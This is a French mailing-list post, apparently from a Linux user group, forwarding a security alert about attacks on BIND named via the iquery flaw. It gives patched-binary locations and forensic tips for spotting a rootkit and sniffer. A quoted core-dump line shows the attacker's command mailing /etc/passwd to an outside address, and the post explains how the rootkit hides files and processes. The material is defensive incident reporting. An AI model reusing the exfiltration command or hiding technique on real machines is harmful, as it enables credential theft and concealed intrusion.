Trou de securite dans named (DNS)

Top Page

Reply to this message
Author: Laurent Julliard
Date:  
To: guilde
CC: nainemou
Subject: Trou de securite dans named (DNS)
Pour votre information.

Laurent Julliard

Bonjour,

Je ne peux diffuser ceci sur l'adresse guilde a cause du 'begaiement'
de mon mail. Mais je pense que cette info concernant les attaques
sur named sur linux entre-autre est importante.
Nous l'avons subie egalement sur HP9000.

Patrick




Bonjour,

Toujours à propos de  la    vague   d'attaque DNS/bind,  voici     des
informations que nous avons  obtenues et  qui pourront peut-être  vous
être utile.


D'autre part, Claudine Médéric a déposé à l'URL
        ftp://ftp.cict.fr/pub/unix/bind/ 
les versions déjà compilées pour Solaris2.5 et HPUX10.20 de named non
vulnérables à ces attaques (8.1.2).


Plusieurs  scripts   exploitant  la  faille    iquery  du  DNS   (CERT
98/043,CA-98.05) sont disponibles.  L'un d'entre eux permet de scanner
un grand  nombre  d'@IP et  de tester  la vulnérabilité du  DNS s'il y
tourne.  S'il semble qu'aujourd'hui seuls  les  DNS tournant sur Linux
soient susceptibles d'être  compromis (parce que  le code le prévoit),
l'effet sur les autres DNS est de les rendre inactifs (crash).


Un fichier core est créé (dans le repertoire contenant les infos DNS
du site). Dans certains cas, on peut y trouver (vers la fin) la
commande qui a été passée au named.

Exemple :
# strings core | tail -50
23151
23151
/usr/share/lib/zoneinfo/MET
addr.arpa) conta
HLame server on '%s' (in '%s'?): %s%s
2.in-addr.arpa
/bin/sh
cat /etc/passwd | mail ncros@???
21740
/usr/sbin/in.named
DISPLAY=ncd-tx-pb.cict.fr:0.0
EDITOR=emacs
HOME=/users/sysmaint/pb
LOGNAME=pb
MANPATH=/usr/share/man:/usr/local/man:/usr/openwin/man

Un de nos DNS (Linux) a été compromis. Nous y avons trouvé les traces
suivantes (signalant l'installation du RootKit, qui permet de masquer
l'activité du pirate sur la machine).

[root@mtest /]# strings /bin/ls | grep dev
/dev/ptyr
[root@mtest /]# strings /bin/ps | grep pty
/dev/ptyp
[root@mtest /]# strings /usr/bin/pstree | grep pty
/dev/ptyp
[root@mtest /]# cat /dev/ptyp
2 lpv

Les  fichiers     /dev/pty[r|p|q]    contiennent la      liste     des
fichiers|process|connexions_réseau a cacher.


Pour rechercher les infos sur une telle machine, il faut donc utiliser
un version sûre (sauvegarde) de nestat, ps, ... Pour les fichiers,
utiliser find ou ls ./ (dès qu'il y a un /, le masquage ne fonctionne
plus).

/usr/sbin/lpv est un sniffer, qui stocke ses infos dans ./tcp.log

Le rootkit est facilement paramètrable, donc les /dev/ptyp peuvent
changer de nom/place.


Merci à Laurent Facq (facq@???) pour ses infos.


--
===============================================================
|  Equipe M.O.S.T.         | http://most.hmg.inpg.fr          |
|  Patrick BEGOU           |       ------------               |
|  LEGI                    | mailto:Patrick.Begou@hmg.inpg.fr |
|  BP 53 X                 | Tel 04 76 82 51 35               |
|  38041 GRENOBLE CEDEX    | Fax 04 76 82 52 71               |

===============================================================